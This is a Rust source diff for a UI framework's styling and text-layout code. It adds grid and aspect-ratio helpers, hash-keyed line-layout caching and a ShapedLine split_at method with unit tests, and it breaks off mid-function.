/// Sets the element to justify flex items against the start of the container's main axis.
/// [Docs](https://tailwindcss.com/docs/justify-content#start)
fn justify_start(mut self) -> Self {
@@ -384,6 +433,20 @@ pub trait Styled: Sized {
self
}
+ /// Sets the aspect ratio of the element.
+ /// [Docs](https://tailwindcss.com/docs/aspect-ratio)
+ fn aspect_ratio(mut self, ratio: f32) -> Self {
+ self.style().aspect_ratio = Some(ratio);
+ self
+ }
+
+ /// Sets the aspect ratio of the element to 1/1 – equal width and height.
+ /// [Docs](https://tailwindcss.com/docs/aspect-ratio)
+ fn aspect_square(mut self) -> Self {
+ self.style().aspect_ratio = Some(1.0);
+ self
+ }
+
/// Sets the background color of the element.
fn bg<F>(mut self, fill: F) -> Self
where
@@ -648,20 +711,38 @@ pub trait Styled: Sized {
/// Sets the grid columns of this element.
fn grid_cols(mut self, cols: u16) -> Self {
- self.style().grid_cols = Some(cols);
+ self.style().grid_cols = Some(GridTemplate {
+ repeat: cols,
+ min_size: TemplateColumnMinSize::Zero,
+ });
self
}
/// Sets the grid columns with min-content minimum sizing.
/// Unlike grid_cols, it won't shrink to width 0 in AvailableSpace::MinContent constraints.
fn grid_cols_min_content(mut self, cols: u16) -> Self {
- self.style().grid_cols_min_content = Some(cols);
+ self.style().grid_cols = Some(GridTemplate {
+ repeat: cols,
+ min_size: TemplateColumnMinSize::MinContent,
+ });
+ self
+ }
+
+ /// Sets the grid columns with max-content maximum sizing for content-based column widths.
+ fn grid_cols_max_content(mut self, cols: u16) -> Self {
+ self.style().grid_cols = Some(GridTemplate {
+ repeat: cols,
+ min_size: TemplateColumnMinSize::MaxContent,
+ });
self
}
/// Sets the grid rows of this element.
fn grid_rows(mut self, rows: u16) -> Self {
- self.style().grid_rows = Some(rows);
+ self.style().grid_rows = Some(GridTemplate {
+ repeat: rows,
+ min_size: TemplateColumnMinSize::Zero,
+ });
self
}
@@ -1,6 +1,6 @@
use crate::{
- AbsoluteLength, App, Bounds, DefiniteLength, Edges, Length, Pixels, Point, Size, Style, Window,
- point, size,
+ AbsoluteLength, App, Bounds, DefiniteLength, Edges, GridTemplate, Length, Pixels, Point, Size,
+ Style, Window, point, size,
};
use collections::{FxHashMap, FxHashSet};
use stacksafe::{StackSafe, stacksafe};
@@ -8,7 +8,7 @@ use std::{fmt::Debug, ops::Range};
use taffy::{
TaffyTree, TraversePartialTree as _,
geometry::{Point as TaffyPoint, Rect as TaffyRect, Size as TaffySize},
- prelude::min_content,
+ prelude::{max_content, min_content},
style::AvailableSpace as TaffyAvailableSpace,
tree::NodeId,
};
@@ -308,19 +308,31 @@ impl ToTaffy<taffy::style::Style> for Style {
}
fn to_grid_repeat<T: taffy::style::CheapCloneStr>(
- unit: &Option<u16>,
+ unit: &Option<GridTemplate>,
) -> Vec<taffy::GridTemplateComponent<T>> {
- // grid-template-columns: repeat(<number>, minmax(0, 1fr));
- unit.map(|count| vec![repeat(count, vec![minmax(length(0.0), fr(1.0))])])
- .unwrap_or_default()
- }
-
- fn to_grid_repeat_min_content<T: taffy::style::CheapCloneStr>(
- unit: &Option<u16>,
- ) -> Vec<taffy::GridTemplateComponent<T>> {
- // grid-template-columns: repeat(<number>, minmax(min-content, 1fr));
- unit.map(|count| vec![repeat(count, vec![minmax(min_content(), fr(1.0))])])
- .unwrap_or_default()
+ unit.map(|template| {
+ match template.min_size {
+ // grid-template-*: repeat(<number>, minmax(0, 1fr));
+ crate::TemplateColumnMinSize::Zero => {
+ vec![repeat(template.repeat, vec![minmax(length(0.0), fr(1.0))])]
+ }
+ // grid-template-*: repeat(<number>, minmax(min-content, 1fr));
+ crate::TemplateColumnMinSize::MinContent => {
+ vec![repeat(
+ template.repeat,
+ vec![minmax(min_content(), fr(1.0))],
+ )]
+ }
+ // grid-template-*: repeat(<number>, minmax(0, max-content))
+ crate::TemplateColumnMinSize::MaxContent => {
+ vec![repeat(
+ template.repeat,
+ vec![minmax(length(0.0), max_content())],
+ )]
+ }
+ }
+ })
+ .unwrap_or_default()
}
taffy::style::Style {
@@ -347,11 +359,7 @@ impl ToTaffy<taffy::style::Style> for Style {
flex_grow: self.flex_grow,
flex_shrink: self.flex_shrink,
grid_template_rows: to_grid_repeat(&self.grid_rows),
- grid_template_columns: if self.grid_cols_min_content.is_some() {
- to_grid_repeat_min_content(&self.grid_cols_min_content)
- } else {
- to_grid_repeat(&self.grid_cols)
- },
+ grid_template_columns: to_grid_repeat(&self.grid_cols),
grid_row: self
.grid_location
.as_ref()
@@ -63,7 +63,8 @@ pub struct TextSystem {
}
impl TextSystem {
- pub(crate) fn new(platform_text_system: Arc<dyn PlatformTextSystem>) -> Self {
+ /// Create a new TextSystem with the given platform text system.
+ pub fn new(platform_text_system: Arc<dyn PlatformTextSystem>) -> Self {
TextSystem {
platform_text_system,
font_metrics: RwLock::default(),
@@ -372,7 +373,8 @@ pub struct WindowTextSystem {
}
impl WindowTextSystem {
- pub(crate) fn new(text_system: Arc<TextSystem>) -> Self {
+ /// Create a new WindowTextSystem with the given TextSystem.
+ pub fn new(text_system: Arc<TextSystem>) -> Self {
Self {
line_layout_cache: LineLayoutCache::new(text_system.platform_text_system.clone()),
text_system,
@@ -438,6 +440,74 @@ impl WindowTextSystem {
}
}
+ /// Shape the given line using a caller-provided content hash as the cache key.
+ ///
+ /// This enables cache hits without materializing a contiguous `SharedString` for the text.
+ /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping.
+ ///
+ /// Contract (caller enforced):
+ /// - Same `text_hash` implies identical text content (collision risk accepted by caller).
+ /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions).
+ ///
+ /// Like [`Self::shape_line`], this must be used only for single-line text (no `\n`).
+ pub fn shape_line_by_hash(
+ &self,
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &[TextRun],
+ force_width: Option<Pixels>,
+ materialize_text: impl FnOnce() -> SharedString,
+ ) -> ShapedLine {
+ let mut decoration_runs = SmallVec::<[DecorationRun; 32]>::new();
+ for run in runs {
+ if let Some(last_run) = decoration_runs.last_mut()
+ && last_run.color == run.color
+ && last_run.underline == run.underline
+ && last_run.strikethrough == run.strikethrough
+ && last_run.background_color == run.background_color
+ {
+ last_run.len += run.len as u32;
+ continue;
+ }
+ decoration_runs.push(DecorationRun {
+ len: run.len as u32,
+ color: run.color,
+ background_color: run.background_color,
+ underline: run.underline,
+ strikethrough: run.strikethrough,
+ });
+ }
+
+ let mut used_force_width = force_width;
+ let layout = self.layout_line_by_hash(
+ text_hash,
+ text_len,
+ font_size,
+ runs,
+ used_force_width,
+ || {
+ let text = materialize_text();
+ debug_assert!(
+ text.find('\n').is_none(),
+ "text argument should not contain newlines"
+ );
+ text
+ },
+ );
+
+ // We only materialize actual text on cache miss; on hit we avoid allocations.
+ // Since `ShapedLine` carries a `SharedString`, use an empty placeholder for hits.
+ // NOTE: Callers must not rely on `ShapedLine.text` for content when using this API.
+ let text: SharedString = SharedString::new_static("");
+
+ ShapedLine {
+ layout,
+ text,
+ decoration_runs,
+ }
+ }
+
/// Shape a multi line string of text, at the given font_size, for painting to the screen.
/// Subsets of the text can be styled independently with the `runs` parameter.
/// If `wrap_width` is provided, the line breaks will be adjusted to fit within the given width.
@@ -627,6 +697,130 @@ impl WindowTextSystem {
layout
}
+
+ /// Probe the line layout cache using a caller-provided content hash, without allocating.
+ ///
+ /// Returns `Some(layout)` if the layout is already cached in either the current frame
+ /// or the previous frame. Returns `None` if it is not cached.
+ ///
+ /// Contract (caller enforced):
+ /// - Same `text_hash` implies identical text content (collision risk accepted by caller).
+ /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions).
+ pub fn try_layout_line_by_hash(
+ &self,
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &[TextRun],
+ force_width: Option<Pixels>,
+ ) -> Option<Arc<LineLayout>> {
+ let mut last_run = None::<&TextRun>;
+ let mut font_runs = self.font_runs_pool.lock().pop().unwrap_or_default();
+ font_runs.clear();
+
+ for run in runs.iter() {
+ let decoration_changed = if let Some(last_run) = last_run
+ && last_run.color == run.color
+ && last_run.underline == run.underline
+ && last_run.strikethrough == run.strikethrough
+ // we do not consider differing background color relevant, as it does not affect glyphs
+ // && last_run.background_color == run.background_color
+ {
+ false
+ } else {
+ last_run = Some(run);
+ true
+ };
+
+ let font_id = self.resolve_font(&run.font);
+ if let Some(font_run) = font_runs.last_mut()
+ && font_id == font_run.font_id
+ && !decoration_changed
+ {
+ font_run.len += run.len;
+ } else {
+ font_runs.push(FontRun {
+ len: run.len,
+ font_id,
+ });
+ }
+ }
+
+ let layout = self.line_layout_cache.try_layout_line_by_hash(
+ text_hash,
+ text_len,
+ font_size,
+ &font_runs,
+ force_width,
+ );
+
+ self.font_runs_pool.lock().push(font_runs);
+
+ layout
+ }
+
+ /// Layout the given line of text using a caller-provided content hash as the cache key.
+ ///
+ /// This enables cache hits without materializing a contiguous `SharedString` for the text.
+ /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping.
+ ///
+ /// Contract (caller enforced):
+ /// - Same `text_hash` implies identical text content (collision risk accepted by caller).
+ /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions).
+ pub fn layout_line_by_hash(
+ &self,
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &[TextRun],
+ force_width: Option<Pixels>,
+ materialize_text: impl FnOnce() -> SharedString,
+ ) -> Arc<LineLayout> {
+ let mut last_run = None::<&TextRun>;
+ let mut font_runs = self.font_runs_pool.lock().pop().unwrap_or_default();
+ font_runs.clear();
+
+ for run in runs.iter() {
+ let decoration_changed = if let Some(last_run) = last_run
+ && last_run.color == run.color
+ && last_run.underline == run.underline
+ && last_run.strikethrough == run.strikethrough
+ // we do not consider differing background color relevant, as it does not affect glyphs
+ // && last_run.background_color == run.background_color
+ {
+ false
+ } else {
+ last_run = Some(run);
+ true
+ };
+
+ let font_id = self.resolve_font(&run.font);
+ if let Some(font_run) = font_runs.last_mut()
+ && font_id == font_run.font_id
+ && !decoration_changed
+ {
+ font_run.len += run.len;
+ } else {
+ font_runs.push(FontRun {
+ len: run.len,
+ font_id,
+ });
+ }
+ }
+
+ let layout = self.line_layout_cache.layout_line_by_hash(
+ text_hash,
+ text_len,
+ font_size,
+ &font_runs,
+ force_width,
+ materialize_text,
+ );
+
+ self.font_runs_pool.lock().push(font_runs);
+
+ layout
+ }
}
#[derive(Hash, Eq, PartialEq)]
@@ -802,6 +996,11 @@ impl TextRun {
#[repr(C)]
pub struct GlyphId(pub u32);
+/// Parameters for rendering a glyph, used as cache keys for raster bounds.
+///
+/// This struct identifies a specific glyph rendering configuration including
+/// font, size, subpixel positioning, and scale factor. It's used to look up
+/// cached raster bounds and sprite atlas entries.
#[derive(Clone, Debug, PartialEq)]
#[expect(missing_docs)]
pub struct RenderGlyphParams {
@@ -1,12 +1,24 @@
use crate::{
- App, Bounds, Half, Hsla, LineLayout, Pixels, Point, Result, SharedString, StrikethroughStyle,
- TextAlign, UnderlineStyle, Window, WrapBoundary, WrappedLineLayout, black, fill, point, px,
- size,
+ App, Bounds, DevicePixels, Half, Hsla, LineLayout, Pixels, Point, RenderGlyphParams, Result,
+ ShapedGlyph, ShapedRun, SharedString, StrikethroughStyle, TextAlign, UnderlineStyle, Window,
+ WrapBoundary, WrappedLineLayout, black, fill, point, px, size,
};
use derive_more::{Deref, DerefMut};
use smallvec::SmallVec;
use std::sync::Arc;
+/// Pre-computed glyph data for efficient painting without per-glyph cache lookups.
+///
+/// This is produced by `ShapedLine::compute_glyph_raster_data` during prepaint
+/// and consumed by `ShapedLine::paint_with_raster_data` during paint.
+#[derive(Clone, Debug)]
+pub struct GlyphRasterData {
+ /// The raster bounds for each glyph, in paint order.
+ pub bounds: Vec<Bounds<DevicePixels>>,
+ /// The render params for each glyph (needed for sprite atlas lookup).
+ pub params: Vec<RenderGlyphParams>,
+}
+
/// Set the text decoration for a run of text.
#[derive(Debug, Clone)]
pub struct DecorationRun {
@@ -44,6 +56,14 @@ impl ShapedLine {
self.layout.len
}
+ /// The width of the shaped line in pixels.
+ ///
+ /// This is the glyph advance width computed by the text shaping system and is useful for
+ /// incrementally advancing a "pen" when painting multiple fragments on the same row.
+ pub fn width(&self) -> Pixels {
+ self.layout.width
+ }
+
/// Override the len, useful if you're rendering text a
/// as text b (e.g. rendering invisibles).
pub fn with_len(mut self, len: usize) -> Self {
@@ -108,6 +128,120 @@ impl ShapedLine {
Ok(())
}
+
+ /// Split this shaped line at a byte index, returning `(prefix, suffix)`.
+ ///
+ /// - `prefix` contains glyphs for bytes `[0, byte_index)` with original positions.
+ /// Its width equals the x-advance up to the split point.
+ /// - `suffix` contains glyphs for bytes `[byte_index, len)` with positions
+ /// shifted left so the first glyph starts at x=0, and byte indices rebased to 0.
+ /// - Decoration runs are partitioned at the boundary; a run that straddles it is
+ /// split into two with adjusted lengths.
+ /// - `font_size`, `ascent`, and `descent` are copied to both halves.
+ pub fn split_at(&self, byte_index: usize) -> (ShapedLine, ShapedLine) {
+ let x_offset = self.layout.x_for_index(byte_index);
+
+ // Partition glyph runs. A single run may contribute glyphs to both halves.
+ let mut left_runs = Vec::new();
+ let mut right_runs = Vec::new();
+
+ for run in &self.layout.runs {
+ let split_pos = run.glyphs.partition_point(|g| g.index < byte_index);
+
+ if split_pos > 0 {
+ left_runs.push(ShapedRun {
+ font_id: run.font_id,
+ glyphs: run.glyphs[..split_pos].to_vec(),
+ });
+ }
+
+ if split_pos < run.glyphs.len() {
+ let right_glyphs = run.glyphs[split_pos..]
+ .iter()
+ .map(|g| ShapedGlyph {
+ id: g.id,
+ position: point(g.position.x - x_offset, g.position.y),
+ index: g.index - byte_index,
+ is_emoji: g.is_emoji,
+ })
+ .collect();
+ right_runs.push(ShapedRun {
+ font_id: run.font_id,
+ glyphs: right_glyphs,
+ });
+ }
+ }
+
+ // Partition decoration runs. A run straddling the boundary is split into two.
+ let mut left_decorations = SmallVec::new();
+ let mut right_decorations = SmallVec::new();
+ let mut decoration_offset = 0u32;
+ let split_point = byte_index as u32;
+
+ for decoration in &self.decoration_runs {
+ let run_end = decoration_offset + decoration.len;
+
+ if run_end <= split_point {
+ left_decorations.push(decoration.clone());
+ } else if decoration_offset >= split_point {
+ right_decorations.push(decoration.clone());
+ } else {
+ let left_len = split_point - decoration_offset;
+ let right_len = run_end - split_point;
+ left_decorations.push(DecorationRun {
+ len: left_len,
+ color: decoration.color,
+ background_color: decoration.background_color,
+ underline: decoration.underline,
+ strikethrough: decoration.strikethrough,
+ });
+ right_decorations.push(DecorationRun {
+ len: right_len,
+ color: decoration.color,
+ background_color: decoration.background_color,
+ underline: decoration.underline,
+ strikethrough: decoration.strikethrough,
+ });
+ }
+
+ decoration_offset = run_end;
+ }
+
+ // Split text
+ let left_text = SharedString::new(self.text[..byte_index].to_string());
+ let right_text = SharedString::new(self.text[byte_index..].to_string());
+
+ let left_width = x_offset;
+ let right_width = self.layout.width - left_width;
+
+ let left = ShapedLine {
+ layout: Arc::new(LineLayout {
+ font_size: self.layout.font_size,
+ width: left_width,
+ ascent: self.layout.ascent,
+ descent: self.layout.descent,
+ runs: left_runs,
+ len: byte_index,
+ }),
+ text: left_text,
+ decoration_runs: left_decorations,
+ };
+
+ let right = ShapedLine {
+ layout: Arc::new(LineLayout {
+ font_size: self.layout.font_size,
+ width: right_width,
+ ascent: self.layout.ascent,
+ descent: self.layout.descent,
+ runs: right_runs,
+ len: self.layout.len - byte_index,
+ }),
+ text: right_text,
+ decoration_runs: right_decorations,
+ };
+
+ (left, right)
+ }
}
/// A line of text that has been shaped, decorated, and wrapped by the text layout system.
@@ -594,3 +728,268 @@ fn aligned_origin_x(
TextAlign::Right => origin.x + align_width - line_width,
}
}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::{FontId, GlyphId};
+
+ /// Helper: build a ShapedLine from glyph descriptors without the platform text system.
+ /// Each glyph is described as (byte_index, x_position).
+ fn make_shaped_line(
+ text: &str,
+ glyphs: &[(usize, f32)],
+ width: f32,
+ decorations: &[DecorationRun],
+ ) -> ShapedLine {
+ let shaped_glyphs: Vec<ShapedGlyph> = glyphs
+ .iter()
+ .map(|&(index, x)| ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(x), px(0.0)),
+ index,
+ is_emoji: false,
+ })
+ .collect();
+
+ ShapedLine {
+ layout: Arc::new(LineLayout {
+ font_size: px(16.0),
+ width: px(width),
+ ascent: px(12.0),
+ descent: px(4.0),
+ runs: vec![ShapedRun {
+ font_id: FontId(0),
+ glyphs: shaped_glyphs,
+ }],
+ len: text.len(),
+ }),
+ text: SharedString::new(text.to_string()),
+ decoration_runs: SmallVec::from(decorations.to_vec()),
+ }
+ }
+
+ #[test]
+ fn test_split_at_invariants() {
+ // Split "abcdef" at every possible byte index and verify structural invariants.
+ let line = make_shaped_line(
+ "abcdef",
+ &[
+ (0, 0.0),
+ (1, 10.0),
+ (2, 20.0),
+ (3, 30.0),
+ (4, 40.0),
+ (5, 50.0),
+ ],
+ 60.0,
+ &[],
+ );
+
+ for i in 0..=6 {
+ let (left, right) = line.split_at(i);
+
+ assert_eq!(
+ left.width() + right.width(),
+ line.width(),
+ "widths must sum at split={i}"
+ );
+ assert_eq!(
+ left.len() + right.len(),
+ line.len(),
+ "lengths must sum at split={i}"
+ );
+ assert_eq!(
+ format!("{}{}", left.text.as_ref(), right.text.as_ref()),
+ "abcdef",
+ "text must concatenate at split={i}"
+ );
+ assert_eq!(left.font_size, line.font_size, "font_size at split={i}");
+ assert_eq!(right.ascent, line.ascent, "ascent at split={i}");
+ assert_eq!(right.descent, line.descent, "descent at split={i}");
+ }
+
+ // Edge: split at 0 produces no left runs, full content on right
+ let (left, right) = line.split_at(0);
+ assert_eq!(left.runs.len(), 0);
+ assert_eq!(right.runs[0].glyphs.len(), 6);
+
+ // Edge: split at end produces full content on left, no right runs
+ let (left, right) = line.split_at(6);
+ assert_eq!(left.runs[0].glyphs.len(), 6);
+ assert_eq!(right.runs.len(), 0);
+ }
+
+ #[test]
+ fn test_split_at_glyph_rebasing() {
+ // Two font runs (simulating a font fallback boundary at byte 3):
+ // run A (FontId 0): glyphs at bytes 0,1,2 positions 0,10,20
+ // run B (FontId 1): glyphs at bytes 3,4,5 positions 30,40,50
+ // Successive splits simulate the incremental splitting done during wrap.
+ let line = ShapedLine {
+ layout: Arc::new(LineLayout {
+ font_size: px(16.0),
+ width: px(60.0),
+ ascent: px(12.0),
+ descent: px(4.0),
+ runs: vec![
+ ShapedRun {
+ font_id: FontId(0),
+ glyphs: vec![
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(0.0), px(0.0)),
+ index: 0,
+ is_emoji: false,
+ },
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(10.0), px(0.0)),
+ index: 1,
+ is_emoji: false,
+ },
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(20.0), px(0.0)),
+ index: 2,
+ is_emoji: false,
+ },
+ ],
+ },
+ ShapedRun {
+ font_id: FontId(1),
+ glyphs: vec![
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(30.0), px(0.0)),
+ index: 3,
+ is_emoji: false,
+ },
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(40.0), px(0.0)),
+ index: 4,
+ is_emoji: false,
+ },
+ ShapedGlyph {
+ id: GlyphId(0),
+ position: point(px(50.0), px(0.0)),
+ index: 5,
+ is_emoji: false,
+ },
+ ],
+ },
+ ],
+ len: 6,
+ }),
+ text: SharedString::new("abcdef".to_string()),
+ decoration_runs: SmallVec::new(),
+ };
+
+ // First split at byte 2 — mid-run in run A
+ let (first, remainder) = line.split_at(2);
+ assert_eq!(first.text.as_ref(), "ab");
+ assert_eq!(first.runs.len(), 1);
+ assert_eq!(first.runs[0].font_id, FontId(0));
+
+ // Remainder "cdef" should have two runs: tail of A (1 glyph) + all of B (3 glyphs)
+ assert_eq!(remainder.text.as_ref(), "cdef");
+ assert_eq!(remainder.runs.len(), 2);
+ assert_eq!(remainder.runs[0].font_id, FontId(0));
+ assert_eq!(remainder.runs[0].glyphs.len(), 1);
+ assert_eq!(remainder.runs[0].glyphs[0].index, 0);
+ assert_eq!(remainder.runs[0].glyphs[0].position.x, px(0.0));
+ assert_eq!(remainder.runs[1].font_id, FontId(1));
+ assert_eq!(remainder.runs[1].glyphs[0].index, 1);
+ assert_eq!(remainder.runs[1].glyphs[0].position.x, px(10.0));
+
+ // Second split at byte 2 within remainder — crosses the run boundary
+ let (second, final_part) = remainder.split_at(2);
+ assert_eq!(second.text.as_ref(), "cd");
+ assert_eq!(final_part.text.as_ref(), "ef");
+ assert_eq!(final_part.runs[0].glyphs[0].index, 0);
+ assert_eq!(final_part.runs[0].glyphs[0].position.x, px(0.0));
+
+ // Widths must sum across all three pieces
+ assert_eq!(
+ first.width() + second.width() + final_part.width(),
+ line.width()
+ );
+ }
+
+ #[test]
+ fn test_split_at_decorations() {
+ // Three decoration runs: red [0..2), green [2..5), blue [5..6).
+ // Split at byte 3 — red goes entirely left, green straddles, blue goes entirely right.
+ let red = Hsla {
+ h: 0.0,
+ s: 1.0,
+ l: 0.5,
+ a: 1.0,
+ };
+ let green = Hsla {
+ h: 0.3,
+ s: 1.0,
+ l: 0.5,
+ a: 1.0,
+ };
+ let blue = Hsla {
+ h: 0.6,
+ s: 1.0,
+ l: 0.5,
+ a: 1.0,
+ };
+
+ let line = make_shaped_line(
+ "abcdef",
+ &[
+ (0, 0.0),
+ (1, 10.0),
+ (2, 20.0),
+ (3, 30.0),
+ (4, 40.0),
+ (5, 50.0),
+ ],
+ 60.0,
+ &[
+ DecorationRun {
+ len: 2,
+ color: red,
+ background_color: None,
+ underline: None,
+ strikethrough: None,
+ },
+ DecorationRun {
+ len: 3,
+ color: green,
+ background_color: None,
+ underline: None,
+ strikethrough: None,
+ },
+ DecorationRun {
+ len: 1,
+ color: blue,
+ background_color: None,
+ underline: None,
+ strikethrough: None,
+ },
+ ],
+ );
+
+ let (left, right) = line.split_at(3);
+
+ // Left: red(2) + green(1) — green straddled, left portion has len 1
+ assert_eq!(left.decoration_runs.len(), 2);
+ assert_eq!(left.decoration_runs[0].len, 2);
+ assert_eq!(left.decoration_runs[0].color, red);
+ assert_eq!(left.decoration_runs[1].len, 1);
+ assert_eq!(left.decoration_runs[1].color, green);
+
+ // Right: green(2) + blue(1) — green straddled, right portion has len 2
+ assert_eq!(right.decoration_runs.len(), 2);
+ assert_eq!(right.decoration_runs[0].len, 2);
+ assert_eq!(right.decoration_runs[0].color, green);
+ assert_eq!(right.decoration_runs[1].len, 1);
+ assert_eq!(right.decoration_runs[1].color, blue);
+ }
+}
@@ -401,12 +401,25 @@ struct FrameCache {
wrapped_lines: FxHashMap<Arc<CacheKey>, Arc<WrappedLineLayout>>,
used_lines: Vec<Arc<CacheKey>>,
used_wrapped_lines: Vec<Arc<CacheKey>>,
+
+ // Content-addressable caches keyed by caller-provided text hash + layout params.
+ // These allow cache hits without materializing a contiguous `SharedString`.
+ //
+ // IMPORTANT: To support allocation-free lookups, we store these maps using a key type
+ // (`HashedCacheKeyRef`) that can be computed without building a contiguous `&str`/`SharedString`.
+ // On miss, we allocate once and store under an owned `HashedCacheKey`.
+ lines_by_hash: FxHashMap<Arc<HashedCacheKey>, Arc<LineLayout>>,
+ wrapped_lines_by_hash: FxHashMap<Arc<HashedCacheKey>, Arc<WrappedLineLayout>>,
+ used_lines_by_hash: Vec<Arc<HashedCacheKey>>,
+ used_wrapped_lines_by_hash: Vec<Arc<HashedCacheKey>>,
}
#[derive(Clone, Default)]
pub(crate) struct LineLayoutIndex {
lines_index: usize,
wrapped_lines_index: usize,
+ lines_by_hash_index: usize,
+ wrapped_lines_by_hash_index: usize,
}
impl LineLayoutCache {
@@ -423,6 +436,8 @@ impl LineLayoutCache {
LineLayoutIndex {
lines_index: frame.used_lines.len(),
wrapped_lines_index: frame.used_wrapped_lines.len(),
+ lines_by_hash_index: frame.used_lines_by_hash.len(),
+ wrapped_lines_by_hash_index: frame.used_wrapped_lines_by_hash.len(),
}
}
@@ -445,6 +460,24 @@ impl LineLayoutCache {
}
current_frame.used_wrapped_lines.push(key.clone());
}
+
+ for key in &previous_frame.used_lines_by_hash
+ [range.start.lines_by_hash_index..range.end.lines_by_hash_index]
+ {
+ if let Some((key, line)) = previous_frame.lines_by_hash.remove_entry(key) {
+ current_frame.lines_by_hash.insert(key, line);
+ }
+ current_frame.used_lines_by_hash.push(key.clone());
+ }
+
+ for key in &previous_frame.used_wrapped_lines_by_hash
+ [range.start.wrapped_lines_by_hash_index..range.end.wrapped_lines_by_hash_index]
+ {
+ if let Some((key, line)) = previous_frame.wrapped_lines_by_hash.remove_entry(key) {
+ current_frame.wrapped_lines_by_hash.insert(key, line);
+ }
+ current_frame.used_wrapped_lines_by_hash.push(key.clone());
+ }
}
pub fn truncate_layouts(&self, index: LineLayoutIndex) {
@@ -453,6 +486,12 @@ impl LineLayoutCache {
current_frame
.used_wrapped_lines
.truncate(index.wrapped_lines_index);
+ current_frame
+ .used_lines_by_hash
+ .truncate(index.lines_by_hash_index);
+ current_frame
+ .used_wrapped_lines_by_hash
+ .truncate(index.wrapped_lines_by_hash_index);
}
pub fn finish_frame(&self) {
@@ -463,6 +502,11 @@ impl LineLayoutCache {
curr_frame.wrapped_lines.clear();
curr_frame.used_lines.clear();
curr_frame.used_wrapped_lines.clear();
+
+ curr_frame.lines_by_hash.clear();
+ curr_frame.wrapped_lines_by_hash.clear();
+ curr_frame.used_lines_by_hash.clear();
+ curr_frame.used_wrapped_lines_by_hash.clear();
}
pub fn layout_wrapped_line<Text>(
@@ -590,6 +634,165 @@ impl LineLayoutCache {
layout
}
}
+
+ /// Try to retrieve a previously-shaped line layout using a caller-provided content hash.
+ ///
+ /// This is a *non-allocating* cache probe: it does not materialize any text. If the layout
+ /// is not already cached in either the current frame or previous frame, returns `None`.
+ ///
+ /// Contract (caller enforced):
+ /// - Same `text_hash` implies identical text content (collision risk accepted by caller).
+ /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions).
+ pub fn try_layout_line_by_hash(
+ &self,
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &[FontRun],
+ force_width: Option<Pixels>,
+ ) -> Option<Arc<LineLayout>> {
+ let key_ref = HashedCacheKeyRef {
+ text_hash,
+ text_len,
+ font_size,
+ runs,
+ wrap_width: None,
+ force_width,
+ };
+
+ let current_frame = self.current_frame.read();
+ if let Some((_, layout)) = current_frame.lines_by_hash.iter().find(|(key, _)| {
+ HashedCacheKeyRef {
+ text_hash: key.text_hash,
+ text_len: key.text_len,
+ font_size: key.font_size,
+ runs: key.runs.as_slice(),
+ wrap_width: key.wrap_width,
+ force_width: key.force_width,
+ } == key_ref
+ }) {
+ return Some(layout.clone());
+ }
+
+ let previous_frame = self.previous_frame.lock();
+ if let Some((_, layout)) = previous_frame.lines_by_hash.iter().find(|(key, _)| {
+ HashedCacheKeyRef {
+ text_hash: key.text_hash,
+ text_len: key.text_len,
+ font_size: key.font_size,
+ runs: key.runs.as_slice(),
+ wrap_width: key.wrap_width,
+ force_width: key.force_width,
+ } == key_ref
+ }) {
+ return Some(layout.clone());
+ }
+
+ None
+ }
+
+ /// Layout a line of text using a caller-provided content hash as the cache key.
+ ///
+ /// This enables cache hits without materializing a contiguous `SharedString` for `text`.
+ /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping.
+ ///
+ /// Contract (caller enforced):
+ /// - Same `text_hash` implies identical text content (collision risk accepted by caller).
+ /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions).
+ pub fn layout_line_by_hash(
+ &self,
+ text_hash: u64,
+ text_len: usize,
+ font_size: Pixels,
+ runs: &[FontRun],
+ force_width: Option<Pixels>,
+ materialize_text: impl FnOnce() -> SharedString,
+ ) -> Arc<LineLayout> {
+ let key_ref = HashedCacheKeyRef {
+ text_hash,
+ text_len,
+ font_size,
+ runs,
+ wrap_width: None,
+ force_width,
+ };
+
+ // Fast path: already cached (no allocation).
+ let current_frame = self.current_frame.upgradable_read();
+ if let Some((_, layout)) = current_frame.lines_by_hash.iter().find(|(key, _)| {
+ HashedCacheKeyRef {
+ text_hash: key.text_hash,
+ text_len: key.text_len,
+ font_size: key.font_size,
+ runs: key.runs.as_slice(),
+ wrap_width: key.wrap_width,
+ force_width: key.force_width,
+ } == key_ref
+ }) {
+ return layout.clone();
+ }
+
+ let mut current_frame = RwLockUpgradableReadGuard::upgrade(current_frame);
+
+ // Try to reuse from previous frame without allocating; do a linear scan to find a matching key.
+ // (We avoid `drain()` here because it would eagerly move all entries.)
+ let mut previous_frame = self.previous_frame.lock();
+ if let Some(existing_key) = previous_frame
+ .used_lines_by_hash
+ .iter()
+ .find(|key| {
+ HashedCacheKeyRef {
+ text_hash: key.text_hash,
+ text_len: key.text_len,
+ font_size: key.font_size,
+ runs: key.runs.as_slice(),
+ wrap_width: key.wrap_width,
+ force_width: key.force_width,
+ } == key_ref
+ })
+ .cloned()
+ {
+ if let Some((key, layout)) = previous_frame.lines_by_hash.remove_entry(&existing_key) {
+ current_frame
+ .lines_by_hash
+ .insert(key.clone(), layout.clone());
+ current_frame.used_lines_by_hash.push(key);
+ return layout;
+ }
+ }
+
+ let text = materialize_text();
+ let mut layout = self
+ .platform_text_system
+ .layout_line(&text, font_size, runs);
+
+ if let Some(force_width) = force_width {
+ let mut glyph_pos = 0;
+ for run in layout.runs.iter_mut() {
+ for glyph in run.glyphs.iter_mut() {
+ if (glyph.position.x - glyph_pos * force_width).abs() > px(1.) {
